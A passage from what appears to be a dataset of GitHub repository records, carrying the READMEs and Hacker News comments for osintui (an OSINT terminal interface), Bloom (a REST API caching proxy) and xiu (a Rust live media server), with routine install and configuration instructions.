API](./docs/broker_http_api.md)\n- [Memory Broker API](./docs/memory_broker_api.md)\n", "readme_type": "markdown", "hn_comments": "I might have an use for it since we will have to expand our Redis instances to clusters at work.I don't know a whole lot about Redis, so I'm struggling to understand what this is. Am I correct in saying that this is just the clustering mechanism? So I'd need to run Redis instances, and use this to cluster them? If so, would this work with KeyDB (would that even make sense)?How does it work ? Is it sharding different keys to different Redis instances ?The master/replica setup is interesting because we did something similar at Shopify, but I don't believe this is conventional for redis cluster. Can you expand on that a bit? eg: Looks like master/replica are together on a host, wouldn't you want them spread out?You are including proxies for clients and server? How do they compare to envoy? eg: Are you doing anything clever to handle failovers transparently for clients?Is the metadata storage just using redis?Like Tendis? https://github.com/Tencent/TendisTendis is a high-performance distributed storage system fully compatible with the Redis protocol.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "wssheldon/osintui", "link": "https://github.com/wssheldon/osintui", "tags": ["osint", "rust", "shodan", "threatintel", "tui", "virustotal", "security", "analysis"], "stars": 663, "description": "\ud83e\udd80\ud83d\udd0e OSINT from your favorite services in a friendly terminal user interface - integrations for Virustotal, Shodan, and Censys", "lang": "Rust", "repo_lang": "", "readme": "
\n# osintui\n\nOpen Source Intelligence Terminal User Interface\n\n[badges: contributors \u00b7 last commit \u00b7 stars \u00b7 open issues \u00b7 license]\n\nReport Bug \u00b7 Request Feature\n\n[screenshot]\n\n----\n\n## Integrations\n\nShodan \u00b7 Censys \u00b7 Virustotal\n
\n\n## Installation\n\nFirst, install [Rust](https://www.rust-lang.org/tools/install) (using the recommended rustup installation method) and then\n\n```\ncargo install osintui\n```\n\n## Configuration\n\nosintui expects a TOML configuration file stored at `~/.osintui/config/config.toml` that sets the necessary API tokens for each service. The configuration file will be created for you on first run if one was not found.\n\n```toml\n[keys]\nvirustotal = \"api_key\"\nshodan = \"api_key\"\ncensys_id = \"api_id\"\ncensys_secret = \"api_key\"\n```\n\n## Hotkeys\n\n| Key | Description |\n| ----------- | ----------- |\n| h | Home |\n| / | Input |\n| q | Back |\n| c | Censys |\n| s | Shodan |\n| v | Virustotal |\n| \u2192 | Move Right |\n| \u2190 | Move Left |\n| \u2191 | Move Up |\n| \u2193 | Move Down |\n\n## Credits\n\n\u2b50 **[spotify-tui](https://github.com/Rigellute/spotify-tui)**\n\nThe software architecture is almost entirely modeled after spotify-tui. The codebase was invaluable in learning how to cleanly manage complex TUI state and implement generic handling of TUI components.\n\n\u2b50 **[wtfis](https://github.com/pirxthepilot/wtfis)**\n\nI needed a good first project to learn rust and wtfis was the primary source of inspiration for osintui.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "valeriansaliou/bloom", "link": "https://github.com/valeriansaliou/bloom", "tags": ["rest", "cache", "dos", "ddos", "scale", "infrastructure", "performance", "http", "speed", "rust", "redis"], "stars": 662, "description": ":cherry_blossom: HTTP REST API caching middleware, to be used between load balancers and REST API workers.", "lang": "Rust", "repo_lang": "", "readme": "Bloom\n=====\n\n[![Test and Build](https://github.com/valeriansaliou/bloom/workflows/Test%20and%20Build/badge.svg?branch=master)](https://github.com/valeriansaliou/bloom/actions?query=workflow%3A%22Test+and+Build%22) [![Build and Release](https://github.com/valeriansaliou/bloom/workflows/Build%20and%20Release/badge.svg)](https://github.com/valeriansaliou/bloom/actions?query=workflow%3A%22Build+and+Release%22) [![dependency status](https://deps.rs/repo/github/valeriansaliou/bloom/status.svg)](https://deps.rs/repo/github/valeriansaliou/bloom) [![Buy Me A Coffee](https://img.shields.io/badge/buy%20me%20a%20coffee-donate-yellow.svg)](https://www.buymeacoffee.com/valeriansaliou)\n\n**Bloom is a REST API caching middleware, acting as a reverse proxy between your load balancers and your REST API workers.**\n\nIt is completely agnostic of your API implementation, and requires minimal changes to your existing API code to work.\n\nBloom relies on `redis`, [configured as a cache](https://github.com/valeriansaliou/bloom/blob/master/examples/config/redis.conf) to store cached data. It is built in Rust and focuses on stability, performance and low resource usage.\n\n**Important: Bloom works great if your API implements REST conventions. 
Your API needs to use HTTP read methods, namely `GET`, `HEAD`, `OPTIONS` solely as read methods (do not use HTTP GET parameters as a way to update data).**\n\n_Tested at Rust version: `rustc 1.62.0 (a8314ef7d 2022-06-27)`_\n\n**\ud83c\uddeb\ud83c\uddf7 Crafted in Brest, France.**\n\n**:newspaper: The Bloom project was initially announced in [a post on my personal journal](https://journal.valeriansaliou.name/announcing-bloom-a-rest-api-caching-middleware/).**\n\n![Bloom](https://valeriansaliou.github.io/bloom/images/bloom.jpg)\n\n## Who uses it?\n\n\n\n\n\n\n\n\n
- Crisp
\n\n_\ud83d\udc4b You use Bloom and you want to be listed there? [Contact me](https://valeriansaliou.name/)._\n\n## Features\n\n* **The same Bloom server can be used for different API workers at once**, using HTTP header `Bloom-Request-Shard` (eg. Main API uses shard `0`, Search API uses shard `1`).\n* **Cache stored on buckets**, specified in your REST API responses using HTTP header `Bloom-Response-Buckets`.\n* **Cache clustered by authentication token**, no cache leak across users is possible, using the standard `Authorization` HTTP header.\n* **Cache can be expired directly from your REST API workers**, via a control channel.\n* **Configurable per-request caching strategy**, using `Bloom-Request-*` HTTP headers in the requests your Load Balancers forward to Bloom.\n * Specify caching shard for an API system with `Bloom-Request-Shard` (default shard is `0`, maximum value is `15`).\n* **Configurable per-response caching strategy**, using `Bloom-Response-*` HTTP headers in your API responses to Bloom.\n * Disable all cache for an API route with `Bloom-Response-Ignore` (with value `1`).\n * Specify caching buckets for an API route with `Bloom-Response-Buckets` (comma-separated if multiple buckets).\n * Specify caching TTL in seconds for an API route with `Bloom-Response-TTL` (other than default TTL, number in seconds).\n* **Serve `304 Not Modified` to non-modified route contents**, lowering bandwidth usage and speeding up requests to your users.\n\n## The Bloom Approach\n\nBloom can be hot-plugged to sit between your existing Load Balancers (eg. NGINX), and your API workers (eg. NodeJS). It has been initially built to reduce the workload and drastically reduce CPU usage in case of API traffic spike, or DOS / DDoS attacks.\n\nA simpler caching approach could have been to enable caching at the Load Balancer level for HTTP read methods (`GET`, `HEAD`, `OPTIONS`). Although simple as a solution, it would not work with a REST API. REST API serve dynamic content by nature, that rely heavily on Authorization headers. Also, any cache needs to be purged at some point, if the content in cache becomes stale due to data updates in some database.\n\nNGINX Lua scripts could do that job just fine, you say! Well, I firmly believe Load Balancers should be simple, and be based on configuration only, without scripting. As Load Balancers are the entry point to all your HTTP / WebSocket services, you'd want to avoid frequent deployments and custom code there, and handoff that caching complexity to a dedicated middleware component.\n\n## How does it work?\n\nBloom is installed on the same server as each of your API workers. As seen from your Load Balancers, there is a Bloom instance per API worker. This way, your Load Balancing setup (eg. Round-Robin with health checks) is not broken. Each Bloom instance can be set to be visible from its own LAN IP your Load Balancers can point to, and then those Bloom instances can point to your API worker listeners on the local loopback.\n\nBloom acts as a Reverse Proxy of its own, and caches read HTTP methods (`GET`, `HEAD`, `OPTIONS`), while directly proxying HTTP write methods (`POST`, `PATCH`, `PUT` and others). All Bloom instances share the same cache storage on a common `redis` instance available on the LAN.\n\nBloom is built in Rust for memory safety, code elegance and especially performance. 
Bloom can be compiled to native code for your server architecture.\n\nBloom has minimal static configuration, and relies on HTTP response headers served by your API workers to configure caching on a per-response basis. Those HTTP headers are intercepted by Bloom and not served to your Load Balancer responses. Those headers are formatted as `Bloom-Response-*`. Upon serving response to your Load Balancers, Bloom sets a cache status header, namely `Bloom-Status` which can be seen publicly in HTTP responses (either with value `HIT`, `MISS` or `DIRECT` \u2014 it helps debug your cache configuration).\n\n![Bloom Schema](https://valeriansaliou.github.io/bloom/docs/models/schema.png)\n\n## How to use it?\n\n### Installation\n\nBloom is built in Rust. To install it, either download a version from the [Bloom releases](https://github.com/valeriansaliou/bloom/releases) page, use `cargo install` or pull the source code from `master`.\n\n\ud83d\udc49 _Each release binary comes with an `.asc` signature file, which can be verified using [@valeriansaliou](https://github.com/valeriansaliou) GPG public key: [:key:valeriansaliou.gpg.pub.asc](https://valeriansaliou.name/files/keys/valeriansaliou.gpg.pub.asc)._\n\n**Install from source:**\n\nIf you pulled the source code from Git, you can build it using `cargo`:\n\n```bash\ncargo build --release\n```\n\nYou can find the built binaries in the `./target/release` directory.\n\n**Install from Cargo:**\n\nYou can install Bloom directly with `cargo install`:\n\n```bash\ncargo install bloom-server\n```\n\nEnsure that your `$PATH` is properly configured to source the Crates binaries, and then run Bloom using the `bloom` command.\n\n**Install from packages:**\n\nDebian & Ubuntu packages are also available. Refer to the _[How to install it on Debian & Ubuntu?](#how-to-install-it-on-debian--ubuntu)_ section.\n\n**Install from Docker Hub:**\n\nYou might find it convenient to run Bloom via Docker. 
You can find the pre-built Bloom image on Docker Hub as [valeriansaliou/bloom](https://hub.docker.com/r/valeriansaliou/bloom/).\n\nFirst, pull the `valeriansaliou/bloom` image:\n\n```bash\ndocker pull valeriansaliou/bloom:v1.31.0\n```\n\nThen, seed it a configuration file and run it (replace `/path/to/your/bloom/config.cfg` with the path to your configuration file):\n\n```bash\ndocker run -p 8080:8080 -p 8811:8811 -v /path/to/your/bloom/config.cfg:/etc/bloom.cfg valeriansaliou/bloom:v1.31.0\n```\n\nIn the configuration file, ensure that:\n\n* `server.inet` is set to `0.0.0.0:8080` (this lets Bloom be reached from outside the container)\n* `control.inet` is set to `0.0.0.0:8811` (this lets Bloom Control be reached from outside the container)\n\nBloom will be reachable from `http://localhost:8080`, and Bloom Control will be reachable from `tcp://localhost:8811`.\n\n### Configuration\n\nUse the sample [config.cfg](https://github.com/valeriansaliou/bloom/blob/master/config.cfg) configuration file and adjust it to your own environment.\n\nMake sure to properly configure the `[proxy]` section so that Bloom points to your API worker host and port.\n\n**Available configuration options are commented below, with allowed values:**\n\n**[server]**\n\n* `log_level` (type: _string_, allowed: `debug`, `info`, `warn`, `error`, default: `error`) \u2014 Verbosity of logging, set it to `error` in production\n* `inet` (type: _string_, allowed: IPv4 / IPv6 + port, default: `[::1]:8080`) \u2014 Host and TCP port the Bloom server should listen on\n\n**[control]**\n\n* `inet` (type: _string_, allowed: IPv4 / IPv6 + port, default: `[::1]:8811`) \u2014 Host and TCP port Bloom Control should listen on\n* `tcp_timeout` (type: _integer_, allowed: seconds, default: `300`) \u2014 Timeout of idle/dead client connections to Bloom Control\n\n**[proxy]**\n\n* `shard_default` (type: _integer_, allowed: `0` to `15`, default: `0`) \u2014 Default shard index to use when no shard is specified in proxied HTTP requests\n\n**[[proxy.shard]]**\n\n* `shard` (type: _integer_, allowed: `0` to `15`, default: `0`) \u2014 Shard index (routed using `Bloom-Request-Shard` in requests to Bloom)\n* `host` (type: _string_, allowed: hostname, IPv4, IPv6, default: `localhost`) \u2014 Target host to proxy to for this shard (ie. where the API listens)\n* `port` (type: _integer_, allowed: TCP port, default: `3000`) \u2014 Target TCP port to proxy to for this shard (ie. 
where the API listens)\n\n**[cache]**\n\n* `ttl_default` (type: _integer_, allowed: seconds, default: `600`) \u2014 Default cache TTL in seconds, when no `Bloom-Response-TTL` provided\n* `executor_pool` (type: _integer_, allowed: `0` to `(2^16)-1`, default: `16`) \u2014 Cache executor pool size (how many cache requests can execute at the same time)\n* `disable_read` (type: _boolean_, allowed: `true`, `false`, default: `false`) \u2014 Whether to disable cache reads (useful for testing)\n* `disable_write` (type: _boolean_, allowed: `true`, `false`, default: `false`) \u2014 Whether to disable cache writes (useful for testing)\n* `compress_body` (type: _boolean_, allowed: `true`, `false`, default: `true`) \u2014 Whether to compress body upon store (using Brotli; usually reduces body size by 40%)\n\n**[redis]**\n\n* `host` (type: _string_, allowed: hostname, IPv4, IPv6, default: `localhost`) \u2014 Target Redis host\n* `port` (type: _integer_, allowed: TCP port, default: `6379`) \u2014 Target Redis TCP port\n* `password` (type: _string_, allowed: password values, default: none) \u2014 Redis password (if no password, dont set this key)\n* `database` (type: _integer_, allowed: `0` to `255`, default: `0`) \u2014 Target Redis database\n* `pool_size` (type: _integer_, allowed: `0` to `(2^32)-1`, default: `80`) \u2014 Redis connection pool size (should be a bit higher than `cache.executor_pool`, as it is used by both Bloom proxy and Bloom Control)\n* `max_lifetime_seconds` (type: _integer_, allowed: seconds, default: `60`) \u2014 Maximum lifetime of a connection to Redis (you want it below 5 minutes, as this affects the reconnect delay to Redis if a connection breaks)\n* `idle_timeout_seconds` (type: _integer_, allowed: seconds, default: `600`) \u2014 Timeout of idle/dead pool connections to Redis\n* `connection_timeout_seconds` (type: _integer_, allowed: seconds, default: `1`) \u2014 Timeout in seconds to consider Redis dead and emit a `DIRECT` connection to API without using cache (keep this low, as when Redis is down it dictates how much time to wait before ignoring Redis response and proxying directly)\n* `max_key_size` (type: _integer_, allowed: bytes, default: `256000`) \u2014 Maximum data size in bytes to store in Redis for a key (safeguard to prevent very large responses to be cached)\n* `max_key_expiration` (type: _integer_, allowed: seconds, default: `2592000`) \u2014 Maximum TTL for a key cached in Redis (prevents erroneous `Bloom-Response-TTL` values)\n\n### Run Bloom\n\nBloom can be run as such:\n\n`./bloom -c /path/to/config.cfg`\n\n**Important: make sure to spin up a Bloom instance for each API worker running on your infrastructure. Bloom does not manage the Load Balancing logic itself, so you should have a Bloom instance per API worker instance and still rely on eg. NGINX for Load Balancing.**\n\n### Configure Load Balancers\n\nOnce Bloom is running and points to your API, you can configure your Load Balancers to point to Bloom IP and port (instead of your API IP and port as previously).\n\n#### NGINX instructions\n\n**\u27a1\ufe0f Configure your existing proxy ruleset**\n\nBloom requires the `Bloom-Request-Shard` HTTP header to be set by your Load Balancer upon proxying a client request to Bloom. 
This header tells Bloom which cache shard to use for storing data (this way, you can have a single Bloom instance for different API sub-systems listening on the same server).\n\n```\n# Your existing ruleset goes here\nproxy_pass http://(...)\n\n# Adds the 'Bloom-Request-Shard' header for Bloom\nproxy_set_header Bloom-Request-Shard 0;\n```\n\n**\u27a1\ufe0f Adjust your existing CORS rules (if used)**\n\nIf your API runs on a dedicated hostname (eg. `https://api.crisp.chat` for [Crisp](https://crisp.chat/en/)), do not forget to adjust your [CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) rules accordingly, so that API Web clients (ie. browsers) can leverage the [ETag](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ETag) header that gets added by Bloom. This will help speed up API read requests on slower networks. **_If you don't have existing CORS rules, you may not need them, so ignore this._**\n\n```\n# Merge those headers with your existing CORS rules\nadd_header 'Access-Control-Allow-Headers' 'If-Match, If-None-Match' always;\nadd_header 'Access-Control-Expose-Headers' 'Vary, ETag' always;\n```\n\n_Note that a shard number is an integer from 0 to 15 (8-bit unsigned number, capped to 16 shards)._\n\n**The response headers that get added by Bloom are:**\n\n* **ETag**: unique identifier for the response data being returned (enables browser caching); [see MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ETag).\n* **Vary**: tells other cache layers (eg. proxies) that the ETag field may vary on each request, so they need to revalidate it; [see MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Vary).\n\n**The request headers that get added by the browser, as a consequence of Bloom adding the request headers above are:**\n\n* **If-Match**: used by the client to match a given server ETag field (on write requests); [see MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/If-Match).\n* **If-None-Match**: used by the client to match a given server ETag field (on read requests); [see MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/If-None-Match).\n\n_Note that you need to add both new request and response headers to your CORS rules. If you forget either one, requests to your API may start to fail on certain browsers (eg. Chrome with `PATCH` requests)._\n\n### Configure Your API\n\nNow that Bloom is running in front of your API and serving requests on behalf of it; your API can instruct Bloom how to behave on a per-response basis.\n\nYour API can send private HTTP headers in responses to Bloom, that are used by Bloom and removed from the response that is served to the request client (the `Bloom-Response-*` HTTP headers).\n\n_Note that your API should not serve responses in a compressed format. Please disable any Gzip or Brotli middleware on your application server, as Bloom will not be able to decode compressed response bodies. Compression of dynamic content should be handled by the load balancer itself._\n\n**\u27a1\ufe0f Do not cache response:**\n\nTo tell Bloom not to cache a response, send the following HTTP header as part of the API response:\n\n`Bloom-Response-Ignore: 1`\n\nBy default, Bloom retains all responses that are safe to cache, as long as they match both:\n\n**1. Cacheable methods:**\n\n* `GET`\n* `HEAD`\n* `OPTIONS`\n\n**2. 
Cacheable status:**\n\n* `OK`\n* `Non-Authoritative Information`\n* `No Content`\n* `Reset Content`\n* `Partial Content`\n* `Multi-Status`\n* `Already Reported`\n* `Multiple Choices`\n* `Moved Permanently`\n* `Found`\n* `See Other`\n* `Permanent Redirect`\n* `Unauthorized`\n* `Payment Required`\n* `Forbidden`\n* `Not Found`\n* `Method Not Allowed`\n* `Gone`\n* `URI Too Long`\n* `Unsupported Media Type`\n* `Range Not Satisfiable`\n* `Expectation Failed`\n* `I'm A Teapot`\n* `Locked`\n* `Failed Dependency`\n* `Precondition Required`\n* `Request Header Fields Too Large`\n* `Not Implemented`\n* `Not Extended`\n\n_Refer to [the list of status codes on Wikipedia](https://en.wikipedia.org/wiki/List_of_HTTP_status_codes) if you want to find the matching status codes._\n\n**\u27a1\ufe0f Set an expiration time on response cache:**\n\nTo tell Bloom to use a certain expiration time on response cache (time after which the cache is invalidated and thus a new response is fetched upon client request), send the following HTTP header as part of the API response (here for a TTL of 60 seconds):\n\n`Bloom-Response-TTL: 60`\n\nBy default, Bloom sets a TTL of 600 seconds (10 minutes), though this can be configured from `config.cfg`.\n\n**\u27a1\ufe0f Tag a cached response (for Bloom Control cache purge):**\n\nIf you'd like to use Bloom Control to programatically purge cached responses (see _[Can cache be programatically expired?](#can-cache-be-programatically-expired)_), you will need to tag those responses when they get cached. You can tell Bloom to tag a cached response in 1 or more bucket, as such:\n\n`Bloom-Response-Buckets: user_id:10012, heavy_route:1203`\n\nThen, when you need to purge the tagged responses for user with identifier `10012`, you can call a Bloom Control cache purge on bucket `user_id:10012`. The flow is similar for bucket `heavy_route:1203`.\n\nBy default, a cached response has no tag, thus it cannot be purged via Bloom Control _as-is_.\n\n## How to install it on Debian & Ubuntu?\n\nBloom provides [pre-built packages](https://packagecloud.io/valeriansaliou/bloom) for Debian-based systems (Debian, Ubuntu, etc.).\n\n**Important: Bloom only provides Debian 10 64 bits packages for now (Debian Buster). You will still be able to use them on other Debian versions, as well as Ubuntu.**\n\n**1\ufe0f\u20e3 Add the Bloom APT repository (eg. for Debian Buster):**\n\n```bash\necho \"deb https://packagecloud.io/valeriansaliou/bloom/debian/ buster main\" > /etc/apt/sources.list.d/valeriansaliou_bloom.list\n```\n\n```bash\ncurl --silent -L https://packagecloud.io/valeriansaliou/bloom/gpgkey | apt-key add -\n```\n\n```bash\napt-get update\n```\n\n**2\ufe0f\u20e3 Install the Bloom package:**\n\n```bash\napt-get install bloom\n```\n\n**3\ufe0f\u20e3 Edit the pre-filled Bloom configuration file:**\n\n```bash\nnano /etc/bloom.cfg\n```\n\n**4\ufe0f\u20e3 Restart Bloom:**\n\n```\nservice bloom restart\n```\n\n## How fast & lightweight is it?\n\nBloom is built in Rust, which can be compiled to native code for your architecture. Rust, unlike eg. Golang, doesn't carry a GC (Garbage Collector), which is usually a bad thing for high-throughput / high-load production systems (as a GC halts all program instruction execution for an amount of time that depends on how many references are kept in memory).\n\nNote that some compromises have been made relative to how Bloom manages memory. Heap-allocated objects are heavily used for the sake of simplicify. ie. 
responses from your API workers are fully buffered in memory before they are served to the client; which has the benefit of draining data from your API workers as fast as your loopback / LAN goes, even if the requester client has a very slow bandwidth.\n\nIn production at [Crisp](https://crisp.chat/en/), we're running multiple Bloom instances (for each of our API worker). Each one handles ~250 HTTP RPS (Requests Per Second), as well as ~500 Bloom Control RPS (eg. cache purges). Each Bloom instance runs on a single 2016 Xeon vCPU paired with 512MB RAM. The kind of HTTP requests Bloom handles is balanced between reads (`GET`, `HEAD`, `OPTIONS`) and writes (`POST`, `PATCH`, `PUT` and others).\n\nWe get the following `htop` feedback on a server running Bloom at such load:\n\n![htop](https://valeriansaliou.github.io/bloom/images/htop.png)\n\n**As you can see, Bloom consumes only a fraction of the CPU time (less than 5%) for a small RAM footprint (~5% which is ~25MB)**. On such a small server, we can predict Bloom could scale to even higher rates (eg. 10k RPS) without putting too much pressure on the system (the underlying NodeJS API worker would be overheating first as it's much heavier than Bloom).\n\nIf you want Bloom to handle very high RPS, make sure to adjust the `cache.executor_pool` and the `redis.pool_size` options to higher values (which may limit your RPS if you have a few milliseconds of latency on your Redis link \u2014 as Redis connections are blocking).\n\n## How does it deal with authenticated routes?\n\nAuthenticated routes are usually used by REST API to return data that's private to the requester user. Bloom being a cache system, it is critical that no cache leak from an authenticated route occur. Bloom solves the issue easily by isolating cache in namespaces for requests that send an HTTP `Authorization` header. This is the default, secure behavior.\n\nIf a route is being requested without HTTP `Authorization` header (ie. the request is anonymous / public), whatever the HTTP response code, that response will be cached by Bloom.\n\nAs your HTTP `Authorization` header contains sensitive authentication data (ie. username and password), Bloom stores those values hashed in `redis` (using a cryptographic hash function). That way, a `redis` database leak on your side will not allow an attacker to recover authentication key pairs.\n\n## Can cache be programatically expired?\n\nYes. As your existing API workers perform the database updates on their end, they are already well aware of when data - _that might be cached by Bloom_ - gets stale. Therefore, Bloom provides an efficient way to tell it to expire cache for a given bucket. This system is called **Bloom Control**.\n\nBloom can be configured to listen on a TCP socket to expose a cache control interface. The default TCP port is 8811. 
Bloom implements a basic Command-ACK protocol.\n\nThis way, your API worker (or any other worker in your infrastructure) can either tell Bloom to:\n\n* **Expire cache for a given bucket.** Note that as a given bucket may contain variations of cache for different HTTP `Authorization` headers, bucket cache for all authentication tokens is purged at the same time when you purge cache for a bucket.\n* **Expire cache for a given HTTP `Authorization` header.** Useful if an user logs-out and revokes their authentication token.\n\n**\u27a1\ufe0f Available commands:**\n\n* `FLUSHB `: flush cache for given bucket namespace\n* `FLUSHA `: flush cache for given authorization\n* `SHARD `: select shard to use for connection\n* `PING`: ping server\n* `QUIT`: stop connection\n\n**\u2b07\ufe0f Control flow example:**\n\n```bash\ntelnet bloom.local 8811\nTrying ::1...\nConnected to bloom.local.\nEscape character is '^]'.\nCONNECTED \nHASHREQ hxHw4AXWSS\nHASHRES 753a5309\nSTARTED\nSHARD 1\nOK\nFLUSHB 2eb6c00c\nOK\nFLUSHA b44c6f8e\nOK\nPING\nPONG\nQUIT\nENDED quit\nConnection closed by foreign host.\n```\n\n**Notice: before any command can be issued, Bloom requires the client to validate its hasher function against the Bloom internal hasher (done with the `HASHREQ` and `HASHRES` exchange). FarmHash is used to hash keys, using the FarmHash.fingerprint32(), which computed results may vary between architectures. This way, most weird Bloom Control issues are prevented in advance.**\n\n**\ud83d\udce6 Bloom Control Libraries:**\n\n* **NodeJS**: **[node-bloom-control](https://www.npmjs.com/package/bloom-control)**\n\n\ud83d\udc49 Cannot find the library for your programming language? Build your own and be referenced here! ([contact me](https://valeriansaliou.name/))\n\n## :fire: Report A Vulnerability\n\nIf you find a vulnerability in Bloom, you are more than welcome to report it directly to [@valeriansaliou](https://github.com/valeriansaliou) by sending an encrypted email to [valerian@valeriansaliou.name](mailto:valerian@valeriansaliou.name). 
Do not report vulnerabilities in public GitHub issues, as they may be exploited by malicious people to target production servers running an unpatched Bloom instance.\n\n**:warning: You must encrypt your email using [@valeriansaliou](https://github.com/valeriansaliou) GPG public key: [:key:valeriansaliou.gpg.pub.asc](https://valeriansaliou.name/files/keys/valeriansaliou.gpg.pub.asc).**\n", "readme_type": "markdown", "hn_comments": "Reminds me of https://varnish-cache.org/Curious, if you already are running NGINX in front, why not just use proxy_cache?I read pretty far into the readme before I realized this doesn't somehow use bloom filters.What's the difference between this and varnish or nginx acting like a reverse proxy?How does it compare to Varnish ?I'm confused why varnish wouldn't work.The stated use case is to have the backend making API calls to the cache layer to invalidate (purge) certain routes when they've changed.You could absolutely do that with varnish.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "harlanc/xiu", "link": "https://github.com/harlanc/xiu", "tags": ["rtmp", "rust", "hls", "rtmp-server", "xiu", "media-server", "live", "cdn", "tokio", "live-streaming", "security", "relay", "m3u8", "ts", "h264", "aac", "cluster", "audio", "video", "http-flv"], "stars": 662, "description": "A simple, high performance and secure live media server in pure Rust (RTMP/HTTP-FLV/HLS/Relay).\ud83e\udd80", "lang": "Rust", "repo_lang": "", "readme": "

[XIU logo]
\n\n\n![XIU](https://img.shields.io/:XIU-blue.svg)[![crates.io](https://img.shields.io/crates/v/xiu.svg)](https://crates.io/crates/xiu)\n[![crates.io](https://img.shields.io/crates/d/xiu.svg)](https://crates.io/crates/xiu)\n![RTMP](https://img.shields.io/:RTMP-blue.svg)[![crates.io](https://img.shields.io/crates/v/rtmp.svg)](https://crates.io/crates/rtmp)\n[![crates.io](https://img.shields.io/crates/d/rtmp.svg)](https://crates.io/crates/rtmp)\n![HTTPFLV](https://img.shields.io/:HTTPFLV-blue.svg)[![crates.io](https://img.shields.io/crates/v/httpflv.svg)](https://crates.io/crates/httpflv)\n[![crates.io](https://img.shields.io/crates/d/httpflv.svg)](https://crates.io/crates/httpflv)\n![HLS](https://img.shields.io/:HLS-blue.svg)[![crates.io](https://img.shields.io/crates/v/hls.svg)](https://crates.io/crates/hls)\n[![crates.io](https://img.shields.io/crates/d/hls.svg)](https://crates.io/crates/hls)\n![FLV](https://img.shields.io/:FLV-blue.svg)[![crates.io](https://img.shields.io/crates/v/xflv.svg)](https://crates.io/crates/xflv)\n[![crates.io](https://img.shields.io/crates/d/xflv.svg)](https://crates.io/crates/xflv)\n![MPEGTS](https://img.shields.io/:MPEGTS-blue.svg)[![crates.io](https://img.shields.io/crates/v/xmpegts.svg)](https://crates.io/crates/xmpegts)\n[![crates.io](https://img.shields.io/crates/d/xmpegts.svg)](https://crates.io/crates/xmpegts)\n[![](https://app.travis-ci.com/harlanc/xiu.svg?branch=master)](https://app.travis-ci.com/github/harlanc/xiu)\n[![](https://img.shields.io/discord/894502149764034560?logo=discord)](https://discord.gg/gS5wBRtpcB)\n![wechat](https://img.shields.io/:\u5fae\u4fe1-harlancc-blue.svg)\n![qqgroup](https://img.shields.io/:QQ\u7fa4-24893069-blue.svg)\n\n\nXIU is a simple and secure live media server written in pure Rust. It currently supports the three popular streaming protocols RTMP/HLS/HTTP-FLV, and it can be deployed as a single node or as a cluster using the relay feature.\n\n## Features\n\n- [x] RTMP\n - [x] Publish and play live streams\n - [x] Relay: static push and static pull\n- [x] HTTPFLV\n- [x] HLS\n- [ ] SRT\n\n## Prerequisites\n#### Install Rust and Cargo\n\n\n[Document](https://doc.rust-lang.org/cargo/getting-started/installation.html)\n\n## Install and Run\n\nThere are two ways to install xiu:\n \n - install directly with cargo\n - build from source\n\n\n### Install with the cargo command\n\nRun the following command to install xiu:\n\n cargo install xiu\n \nRun the following command to show the help information:\n\n xiu -h\n \n A secure and easy to use live media server, hope you love it!!!\n\n Usage: xiu [OPTIONS] <--config |--rtmp >\n\n Options:\n -c, --config Specify the xiu server configuration file path.\n -r, --rtmp Specify the RTMP listening port(e.g.:1935).\n -f, --httpflv Specify the HTTP-FLV listening port(e.g.:8080).\n -s, --hls Specify the HLS listening port(e.g.:8081).\n -l, --log Specify the log level. [possible values: trace, debug, info, warn, error, debug]\n -h, --help Print help\n -V, --version Print version\n \n### Build from source\n\n#### Clone Xiu\n\n git clone https://github.com/harlanc/xiu.git\n \nCheck out the code of the latest released version:\n \n git checkout tags/ -b \n \n#### Build\n\n cd ./xiu/application/xiu\n cargo build --release\n#### Run\n\n cd ./xiu/target/release\n ./xiu -h\n \n## CLI\n\n#### Notes\n\nThe service can be configured either with a configuration file or on the command line. For example:\n\n##### Configure with a configuration file\n\n xiu -c configuration_file_path\n\n##### Configure on the command line\n\n xiu -r 1935 -f 8080 -s 8081 -l info\n\n\n#### Configuration file notes\n\n##### RTMP\n [rtmp]\n enabled = true\n port = 1935\n\n # pull streams from other server node.\n [rtmp.pull]\n enabled = false\n address = \"192.168.0.1\"\n port = 1935\n\n # push streams to other server node.\n [[rtmp.push]]\n enabled = true\n address = \"localhost\"\n port = 1936\n [[rtmp.push]]\n enabled = true\n address = \"192.168.0.3\"\n port = 1935\n \n##### HTTPFLV\n\n [httpflv]\n # true or false to enable or disable the feature\n enabled = true\n # listening port\n port = 8081\n\n##### HLS\n [hls]\n # true or false to enable or disable the feature\n enabled = true\n # listening port\n port = 8080\n\n##### Log\n\n [log]\n level = \"info\"\n [log.file]\n # enable or disable logging to a file (note: logs go either to the console or to a file, only one of the two).\n enabled = true\n # set the rotate\n rotate = \"hour\" #[day,hour,minute]\n # set the path where the logs are saved\n path = \"./logs\"\n\n### Example configurations\n\nSome ready-made configuration files are located in the following directory:\n\n xiu/application/xiu/src/config\n\nIt contains 4 configuration files:\n\n config_rtmp.toml //enables rtmp only\n config_rtmp_hls.toml //enables rtmp and hls\n config_rtmp_httpflv.toml //enables rtmp and httpflv\n config_rtmp_httpflv_hls.toml //enables all 3 protocols\n \n\n \n## Usage scenarios\n\n##### Publish\n\nAny publishing software or command-line tool can be used to push an RTMP stream, for example OBS or the ffmpeg command line:\n\n ffmpeg -re -stream_loop -1 -i test.mp4 -c:a copy -c:v copy -f flv -flvflags no_duration_filesize rtmp://127.0.0.1:1935/live/test\n\n\n##### Play\n\nUse ffplay to play rtmp/httpflv/hls live streams:\n\n ffplay -i rtmp://localhost:1935/live/test\n ffplay -i http://localhost:8081/live/test.flv\n ffplay -i http://localhost:8080/live/test/test.m3u8\n \n##### Relay - static push\n\nThe scenario is that live streams on an edge node are pushed to an origin node. The configuration is as follows:\n\nEdge node configuration file config_push.toml:\n\n [rtmp]\n enabled = true\n port = 1935\n [[rtmp.push]]\n enabled = true\n address = \"localhost\"\n port = 1936\n \nOrigin node configuration file config.toml:\n\n [rtmp]\n enabled = true\n port = 
